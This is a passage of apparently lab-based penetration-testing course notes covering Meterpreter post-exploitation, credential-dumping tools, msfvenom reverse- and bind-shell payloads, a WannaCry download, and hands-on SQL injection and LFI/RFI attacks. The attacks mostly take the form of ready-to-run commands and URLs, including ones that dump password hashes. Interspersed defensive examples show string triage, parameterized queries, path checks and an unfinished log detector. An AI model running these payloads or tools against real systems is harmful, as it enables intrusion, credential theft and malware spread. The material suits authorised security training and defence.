  1569.  
  1570. meterpreter > mimikatz_command -f crypto::listCertificates
  1571.  
  1572. meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
  1573.  
  1574. meterpreter > mimikatz_command -f crypto::patchcapi
  1575.  
  1576. meterpreter> search -d <directory> -f <file-pattern>
  1577. -----------------------------------------------------------------------
  1578. ###########################################
  1579. # Section 4: Custom Meterpreter Scripting #
  1580. ###########################################
  1581. ---------------------------Type This-----------------------------------
  1582. cd ~
  1583. mkdir binaries
  1584. cd ~/binaries
  1585. wget https://s3.amazonaws.com/infosecaddictsfiles/wce.exe
  1586. wget https://s3.amazonaws.com/infosecaddictsfiles/nc.exe
  1587. wget https://s3.amazonaws.com/infosecaddictsfiles/mimikatz.exe
  1588. -----------------------------------------------------------------------
- In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit can offer. This will also show you the flexibility of the Meterpreter scripts.
  1592.  
  1593. - We're going to start off with a simple Hello World script first.
  1594.  
  1595. ---------------------------Type This-----------------------------------
  1596. echo 'print_status("Hello World")' > /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb
  1597. -----------------------------------------------------------------------
  1598.  
  1599. - This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
  1600.  
- Let's test out our helloworld.rb Meterpreter script.
  1602.  
  1603. ---------------------------Type This-----------------------------------
  1604. meterpreter> run helloworld
  1605.  
  1606.  
- So far so good. Now we can build on this base. Let's add a couple more API calls to the script.

- Open /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb in your favorite editor and add the following lines.
  1612. ---------------------------Type This-----------------------------------
  1613. vi /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb
  1614.  
  1615.  
  1616. ---------------------------Type This-----------------------------------
  1617. print_error("this is an error!")
  1618. print_line("this is a line")
  1619.  
  1620. - Now run the script:
  1621.  
  1622. meterpreter> run helloworld
  1623.  
  1624.  
  1625. - Now that we have the basics down, we're going to do something a little more exciting.
  1626. - The architecture to follow when creating these scripts goes as follows:
  1627.  
def getinfo(session)
  begin
    <stuff goes here>
  rescue ::Exception => e
    <stuff goes here>
  end
end
  1635.  
  1636. -----------------------------------------------------------------------
  1637. - Copy and paste the following code into our helloworld.rb script:
  1638. ---------------------------Type This-----------------------------------
def getinfo(session)
  begin
    # Ask the session once for host details and the account it runs as
    sysnfo  = session.sys.config.sysinfo
    runpriv = session.sys.config.getuid
    print_status("Getting system information ...")
    print_status("The target machine OS is #{sysnfo['OS']}")
    print_status("The computer name is #{sysnfo['Computer']}")
    print_status("Script running as #{runpriv}")
  rescue ::Exception => e
    print_error("The following error was encountered #{e}")
  end
end

getinfo(client)
  1653. --------------------------------------------------------------------------
  1654.  
  1655.  
  1656. - Now run the script:
  1657. ---------------------------Type This-----------------------------------
  1658. meterpreter> run helloworld
  1659.  
  1660.  
- We can expand it by adding actual system commands to the script. Let's look at how we can do this.
  1662.  
  1663. ---------------------------Type This-----------------------------------
def list_exec(session, cmdlst)
  print_status("Running Command List ...")
  r = ''
  session.response_timeout = 120
  cmdlst.each do |cmd|
    begin
      print_status "running command #{cmd}"
      # Hidden + Channelized: no window on the host, output readable over the channel
      r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
      while (d = r.channel.read)
        print_status("#{d}")
      end
      r.channel.close
      r.close
    rescue ::Exception => e
      print_error("Error Running Command #{cmd}: #{e.class} #{e}")
    end
  end
end

commands = [ "set",
             "ipconfig /all",
             "arp -a" ]

list_exec(client, commands)
  1689. ------------------------------------------------------------------------
  1690.  
  1691.  
  1692. - Run the script:
  1693. ---------------------------Type This-----------------------------------
  1694. meterpreter> run helloworld
  1695.  
  1696.  
  1697. Note: Add all of the commands from the script below to your helloworld.rb script:
  1698. https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
  1699.  
  1700.  
  1701.  
  1702. ---------------------------------------------------------------------------------
  1703.  
  1704.  
  1705. wget http://45.63.104.73/wannacry.zip
  1706.  
  1707. unzip wannacry.zip
  1708. **** password is infected ***
  1709.  
  1710. file wannacry.exe
  1711.  
  1712. objdump -x wannacry.exe
  1713.  
  1714. strings wannacry.exe
  1715.  
  1716. strings --all wannacry.exe | head -n 6
  1717.  
  1718. strings wannacry.exe | grep -i dll
  1719.  
  1720. strings wannacry.exe | grep -i library
  1721.  
  1722. strings wannacry.exe | grep -i reg
  1723.  
  1724. strings wannacry.exe | grep -i key
  1725.  
  1726. strings wannacry.exe | grep -i rsa
  1727.  
  1728. strings wannacry.exe | grep -i open
  1729.  
  1730. strings wannacry.exe | grep -i get
  1731.  
  1732. strings wannacry.exe | grep -i mutex
  1733.  
  1734. strings wannacry.exe | grep -i irc
  1735.  
  1736. strings wannacry.exe | grep -i join
  1737.  
  1738. strings wannacry.exe | grep -i admin
  1739.  
  1740. strings wannacry.exe | grep -i list
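
Added example (not part of the original class notes): the keyword greps above done in one pass, over both ASCII and UTF-16LE strings. Plain `strings` only reports 8-bit strings unless it is given `-e l`, and Windows binaries keep many strings as UTF-16LE. The byte blob is constructed sample data, not content taken from wannacry.exe.

```python
import re

# Keywords from the grep commands above.
KEYWORDS = ["dll", "library", "reg", "key", "rsa", "open",
            "get", "mutex", "irc", "join", "admin", "list"]

# Constructed sample: binary noise around three ASCII strings and one
# UTF-16LE string. None of these values come from a real sample.
SAMPLE = (b"MZ\x90\x00\x03\x00" + b"LoadLibraryA\x00" + b"\x01\x02"
          + "advapi32.dll".encode("utf-16le") + b"\x00\x00"
          + b"RegOpenKeyExA\x00" + b"\x7f\x80"
          + b"Global\\ExampleMutex0\x00")


def extract_strings(data, min_len=4):
    """Return sorted (offset, encoding, text) for printable runs in data."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii"))
             for m in ascii_re.finditer(data)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16le"))
              for m in utf16_re.finditer(data)]
    return sorted(found)


def triage(data, keywords=KEYWORDS):
    """Return {keyword: [strings containing it]} for keywords that hit."""
    buckets = {}
    for _offset, _encoding, text in extract_strings(data):
        lowered = text.lower()
        for keyword in keywords:
            if keyword in lowered:
                buckets.setdefault(keyword, []).append(text)
    return buckets


if __name__ == "__main__":
    for offset, encoding, text in extract_strings(SAMPLE):
        print(f"{offset:#06x} {encoding:9} {text}")
    for keyword, hits in triage(SAMPLE).items():
        print(f"{keyword:8} {hits}")
```

To run it against a real file, pass `open(path, "rb").read()` to `triage()` inside an isolated analysis VM.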
  1741.  
  1742.  
  1743. cd ~/toolz/metasploit/
  1744. ./msfvenom -p windows/meterpreter/reverse_tcp lhost={<your-linux-vm-ip>} lport=443 -f exe -o ~/yourname_reverseshell_payload.exe
  1745. ./msfvenom -p windows/meterpreter/bind_tcp lport=4444 -f exe -o ~/yourname_bindshell_payload.exe
  1746. ./msfvenom -p windows/exec CMD=calc.exe -f exe -o ~/yourname_calc_payload.exe
  1747. ./msfvenom -p windows/vncinject/reverse_tcp lhost={<your-linux-vm-ip>} lport=443 -f exe -o ~/yourname_vncinject_reverseshell_payload.exe
  1748.  
  1749. cd ~
  1750.  
  1751. ***** now run all of the previous commands against your newly created payloads *****
  1752.  
  1753. **** now upload your newly created payloads to virustotal ****
  1754.  
  1755. **** now upload your newly created payloads to reverse.it ****
  1756.  
  1757.  
  1758.  
  1759. ##################################
  1760. # Basic: Web Application Testing #
  1761. ##################################
  1762.  
Most people are going to tell you to reference the OWASP Testing Guide.
  1764. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  1765.  
  1766. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  1767.  
  1768.  
  1769. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  1770.  
  1771. 1. Does the website talk to a DB?
  1772. - Look for parameter passing (ex: site.com/page.php?id=4)
  1773. - If yes - try SQL Injection
  1774.  
  1775. 2. Can I or someone else see what I type?
  1776. - If yes - try XSS
  1777.  
  1778. 3. Does the page reference a file?
  1779. - If yes - try LFI/RFI
  1780.  
  1781. Let's start with some manual testing against 45.63.104.73
  1782.  
  1783.  
  1784. #######################
  1785. # Attacking PHP/MySQL #
  1786. #######################
  1787.  
  1788. Go to LAMP Target homepage
  1789. https://phpapp.infosecaddicts.com/
  1790.  
  1791.  
  1792.  
  1793. Clicking on the Acer Link:
  1794. https://phpapp.infosecaddicts.com/acre2.php?lap=acer
  1795.  
  1796. - Found parameter passing (answer yes to question 1)
  1797. - Insert ' to test for SQLI
  1798.  
  1799. ---------------------------Type This-----------------------------------
  1800.  
  1801. https://phpapp.infosecaddicts.com/acre2.php?lap=acer'
  1802.  
  1803. -----------------------------------------------------------------------
  1804.  
  1805. Page returns the following error:
  1806. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1
  1807.  
  1808.  
  1809.  
In order to perform union-based SQL injection, we must first determine the number of columns in this query.
We do this using the ORDER BY clause.
  1812.  
  1813. ---------------------------Type This-----------------------------------
  1814.  
  1815. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 100-- +
  1816. -----------------------------------------------------------------------
  1817.  
  1818. Page returns the following error:
  1819. Unknown column '100' in 'order clause'
  1820.  
  1821.  
  1822. ---------------------------Type This-----------------------------------
  1823.  
  1824. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 50-- +
  1825. -----------------------------------------------------------------------
  1826.  
  1827. Page returns the following error:
  1828. Unknown column '50' in 'order clause'
  1829.  
  1830.  
  1831. ---------------------------Type This-----------------------------------
  1832.  
  1833. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 25-- +
  1834. -----------------------------------------------------------------------
  1835.  
  1836. Page returns the following error:
  1837. Unknown column '25' in 'order clause'
  1838.  
  1839.  
  1840. ---------------------------Type This-----------------------------------
  1841.  
  1842. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 12-- +
  1843. -----------------------------------------------------------------------
  1844.  
  1845. Page returns the following error:
  1846. Unknown column '12' in 'order clause'
  1847.  
  1848.  
  1849. ---------------------------Type This-----------------------------------
  1850.  
  1851. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' order by 6-- +
  1852. -----------------------------------------------------------------------
  1853.  
  1854. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  1855.  
  1856.  
  1857.  
  1858. Now we build out the union all select statement with the correct number of columns
  1859.  
  1860. Reference:
  1861. http://www.techonthenet.com/sql/union.php
  1862.  
  1863.  
  1864. ---------------------------Type This-----------------------------------
  1865.  
  1866. https://phpapp.infosecaddicts.com/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  1867. -----------------------------------------------------------------------
  1868.  
  1869.  
  1870.  
Now we negate the parameter value 'acer' by turning it into the word 'null':
  1872. ---------------------------Type This-----------------------------------
  1873.  
  1874. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  1875. -----------------------------------------------------------------------
  1876.  
  1877. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  1878.  
  1879.  
  1880. Use a cheat sheet for syntax:
  1881. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  1882.  
  1883. ---------------------------Type This-----------------------------------
  1884.  
  1885. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  1886.  
  1887. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  1888.  
  1889. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
  1890.  
  1891. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
  1892.  
  1893.  
  1894. https://phpapp.infosecaddicts.com/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
  1895.  
  1896. -----------------------------------------------------------------------
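
Added example (not from the original notes): why the single quote and the UNION string above work against a query built by string concatenation, and what the same inputs do to a parameterized query. Python's sqlite3 stands in for the lab's MySQL backend; the table, column names and rows are constructed assumptions.

```python
import sqlite3

# Six columns, matching the column count found with ORDER BY above.
COLUMNS = "id, brand, model, cpu, price, stock"

# Inputs taken from the walkthrough above.
PROBE_QUOTE = "acer'"
PROBE_UNION = "null' union all select 1,2,3,4,5,6-- j"


def make_db():
    """Constructed sample data; table and column names are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE laptops "
        "(id INTEGER, brand TEXT, model TEXT, cpu TEXT, price TEXT, stock INTEGER)"
    )
    conn.executemany(
        "INSERT INTO laptops VALUES (?, ?, ?, ?, ?, ?)",
        [(1, "acer", "Aspire 5", "i5", "549", 12),
         (2, "dell", "XPS 13", "i7", "999", 4)],
    )
    return conn


def lookup_concatenated(conn, lap):
    """The 'before': the request parameter becomes part of the SQL text."""
    sql = f"SELECT {COLUMNS} FROM laptops WHERE brand = '{lap}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, lap):
    """The fix: the SQL text is constant and the value is bound separately."""
    sql = f"SELECT {COLUMNS} FROM laptops WHERE brand = ?"
    return conn.execute(sql, (lap,)).fetchall()


def handle_request(conn, lap, lookup):
    """Return (status, body). Database errors are never echoed to the client."""
    try:
        return 200, lookup(conn, lap)
    except sqlite3.Error:
        return 500, "Internal error"


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_concatenated),
                     ("parameterized", lookup_parameterized)):
        for value in ("acer", PROBE_QUOTE, PROBE_UNION):
            print(f"{name:14} {value!r:45} -> {handle_request(db, value, fn)}")
```

With the bound parameter the whole input is compared as a brand name, so both probe strings simply match no rows. The generic 500 body also removes the SQL error text that the ORDER BY column counting relies on.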
  1897.  
  1898.  
  1899.  
  1900. ########################
  1901. # Question I get a lot #
  1902. ########################
  1903. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
  1904.  
  1905. Here is a good reference for it:
  1906. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
  1907.  
  1908. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
  1909.  
  1910.  
  1911.  
  1912.  
  1913. #########################
  1914. # File Handling Attacks #
  1915. #########################
  1916.  
  1917. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
  1918.  
  1919. ---------------------------Type This-----------------------------------
  1920.  
  1921. https://phpapp.infosecaddicts.com/showfile.php?filename=about.txt
  1922.  
  1923. -----------------------------------------------------------------------
  1924.  
  1925.  
  1926. See if you can read files on the file system:
  1927. ---------------------------Type This-----------------------------------
  1928.  
  1929. https://phpapp.infosecaddicts.com/showfile.php?filename=/etc/passwd
  1930. -----------------------------------------------------------------------
  1931.  
  1932. We call this attack a Local File Include or LFI.
  1933.  
  1934. Now let's find some text out on the internet somewhere:
  1935. https://www.gnu.org/software/hello/manual/hello.txt
  1936.  
  1937.  
  1938. Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
  1939.  
  1940. ---------------------------Type This-----------------------------------
  1941.  
  1942. https://phpapp.infosecaddicts.com/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
  1943. -----------------------------------------------------------------------
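
Added example (not from the original notes): a file lookup that serves about.txt but refuses the /etc/passwd and URL requests shown above, by resolving the requested name and checking that it stays inside one content directory. It goes slightly beyond the page by also rejecting relative names that resolve outside that directory. The directory layout and function names are assumptions.

```python
import os
import tempfile
from urllib.parse import urlsplit


class RejectedFilename(ValueError):
    """Raised when a requested name must not be served."""


def resolve_requested_file(base_dir, filename):
    """Map a request parameter to a file inside base_dir, or raise."""
    if not filename or "\x00" in filename:
        raise RejectedFilename("empty or malformed name")
    if urlsplit(filename).scheme or filename.startswith("//"):
        raise RejectedFilename("URLs are not local files")       # the RFI request
    if os.path.isabs(filename):
        raise RejectedFilename("absolute paths are not served")  # /etc/passwd
    base = os.path.realpath(base_dir)
    # realpath() resolves symlinks and dot segments before the containment test
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        raise RejectedFilename("path resolves outside the content directory")
    if not os.path.isfile(candidate):
        raise RejectedFilename("no such file")
    return candidate


def show_file(base_dir, filename):
    """Return (status, body); every rejection looks like a plain 404."""
    try:
        path = resolve_requested_file(base_dir, filename)
    except ValueError:
        return 404, ""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return 200, fh.read()


def demo():
    """Run the requests from the page against a constructed content directory."""
    requests = ["about.txt", "/etc/passwd",
                "https://www.gnu.org/software/hello/manual/hello.txt",
                "../outside.txt"]
    with tempfile.TemporaryDirectory() as root:
        content = os.path.join(root, "content")
        os.mkdir(content)
        with open(os.path.join(content, "about.txt"), "w", encoding="utf-8") as fh:
            fh.write("About this site (constructed sample)\n")
        with open(os.path.join(root, "outside.txt"), "w", encoding="utf-8") as fh:
            fh.write("not for serving\n")
        return {name: show_file(content, name) for name in requests}


if __name__ == "__main__":
    for name, (status, body) in demo().items():
        print(status, repr(name), repr(body))
```

In a PHP application, the php.ini directives allow_url_fopen and allow_url_include additionally control whether file functions and include accept URLs at all.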
  1944.  
  1945. #########################################################################################
  1946. # SQL Injection #
  1947. # https://phpapp.infosecaddicts.com/1-Intro_To_SQL_Intection.pptx #
  1948. #########################################################################################
  1949.  
  1950.  
- Another quick way to test for SQLI is to remove the parameter value
  1952.  
  1953.  
  1954. #############################
  1955. # Error-Based SQL Injection #
  1956. #############################
  1957. ---------------------------Type This-----------------------------------
  1958.  
  1959. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  1960. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  1961. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  1962. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  1963. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  1964. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  1965. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  1966. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  1967. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  1968.  
  1969. -----------------------------------------------------------------------
  1970.  
  1971.  
  1972.  
  1973. #############################
  1974. # Union-Based SQL Injection #
  1975. #############################
  1976.  
  1977. ---------------------------Type This-----------------------------------
  1978.  
  1979. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 100--
  1980. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 50--
  1981. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 25--
  1982. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 10--
  1983. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 5--
  1984. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 6--
  1985. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 7--
  1986. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 8--
  1987. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 order by 9--
  1988. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  1989. -----------------------------------------------------------------------
  1990.  
  1991. We are using a union select statement because we are joining the developer's query with one of our own.
  1992. Reference:
  1993. http://www.techonthenet.com/sql/union.php
  1994. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  1995. It removes duplicate rows between the various SELECT statements.
  1996.  
  1997. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  1998.  
  1999. ---------------------------Type This-----------------------------------
  2000.  
  2001. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  2002. -----------------------------------------------------------------------
  2003.  
Negating the parameter value (changing the id=2 to id=-2) makes the original query return no rows, so the page displays the data from our injected SELECT in the columns that echo back to the screen.
  2005.  
  2006. ---------------------------Type This-----------------------------------
  2007.  
  2008. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  2009. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  2010. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  2011. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  2012.  
  2013. -----------------------------------------------------------------------
  2014.  
  2015.  
  2016.  
  2017.  
  2018. - Another way is to see if you can get the backend to perform an arithmetic function
  2019.  
  2020. ---------------------------Type This-----------------------------------
  2021.  
  2022. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(2)
  2023. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(4-2)
  2024. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=(4-1)
  2025.  
  2026.  
  2027.  
  2028. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1=1--
  2029. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1=2--
  2030. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=1*1
  2031. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1 >-1#
  2032. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1<99#
  2033. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 1<>1#
  2034. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 or 2 != 3--
  2035. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 &0#
  2036.  
  2037.  
  2038.  
  2039. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and 1=1--
  2040. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and 1=2--
  2041. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and user='joe' and 1=1--
  2042. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2 and user='dbo' and 1=1--
  2043.  
  2044. -----------------------------------------------------------------------
  2045.  
  2046.  
  2047. ###############################
  2048. # Blind SQL Injection Testing #
  2049. ###############################
  2050. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  2051.  
  2052. 3 - Total Characters
  2053. ---------------------------Type This-----------------------------------
  2054.  
  2055. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  2056. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  2057. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  2058. -----------------------------------------------------------------------
  2059.  
  2060. Let's go for a quick check to see if it's DBO
  2061.  
  2062. ---------------------------Type This-----------------------------------
  2063.  
  2064. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  2065. -----------------------------------------------------------------------
  2066.  
  2067. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  2068.  
  2069. ---------------------------Type This-----------------------------------
  2070.  
  2071. D - 1st Character
  2072. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  2073. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  2074. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  2075. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  2076.  
  2077. B - 2nd Character
  2078. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2079. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2080.  
  2081. O - 3rd Character
  2082. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2083. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  2084. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2085. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2086. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  2087. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
  2088. https://aspdotnetapp.infosecaddicts.com/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2089.  
  2090. -----------------------------------------------------------------------
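
Added example (not from the original notes): detection logic for the request patterns used in the SQL injection sections above (a trailing quote, ORDER BY column counting, UNION SELECT, error-based subselects, WAITFOR DELAY), run over constructed access-log lines. The log format (client IP, request line, status, response seconds), the 5-second threshold and the verdict names are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Assumed log format: client IP, quoted request line, status, seconds to respond.
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) (\d+(?:\.\d+)?)$')

ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)
SIGNATURES = {
    "order_by_probe": ORDER_BY,
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "error_based": re.compile(r"\bin\s*\(\s*select\b", re.I),
    "time_delay": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "dangling_quote": re.compile(r"'\s*$"),
}
# A WAITFOR request that really takes this long strongly suggests it executed.
DELAY_SECONDS = 5.0

# Constructed sample lines (documentation-range IPs, paths from the lab URLs).
SAMPLE_LOG = """\
198.51.100.20 "GET /bookdetail.aspx?id=2 HTTP/1.1" 200 0.021
203.0.113.7 "GET /bookdetail.aspx?id=2%20order%20by%20100-- HTTP/1.1" 500 0.015
203.0.113.7 "GET /bookdetail.aspx?id=2%20order%20by%2050-- HTTP/1.1" 500 0.014
203.0.113.7 "GET /bookdetail.aspx?id=2%20order%20by%209-- HTTP/1.1" 200 0.019
203.0.113.7 "GET /bookdetail.aspx?id=-2%20union%20all%20select%201,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 0.022
203.0.113.7 "GET /bookdetail.aspx?id=2%20or%201%20in%20(SELECT%20DB_NAME(0))-- HTTP/1.1" 500 0.017
203.0.113.7 "GET /bookdetail.aspx?id=2;%20IF%20(LEN(USER)=2)%20WAITFOR%20DELAY%20'00:00:10'-- HTTP/1.1" 200 0.018
203.0.113.7 "GET /bookdetail.aspx?id=2;%20IF%20(LEN(USER)=3)%20WAITFOR%20DELAY%20'00:00:10'-- HTTP/1.1" 200 10.031
192.0.2.44 "GET /acre2.php?lap=acer' HTTP/1.1" 200 0.030
"""


def analyze(log_text):
    """Group signature hits per client IP; clients with no hits are omitted."""
    report = {}
    for line in log_text.splitlines():
        match = LOG_RE.match(line.strip())
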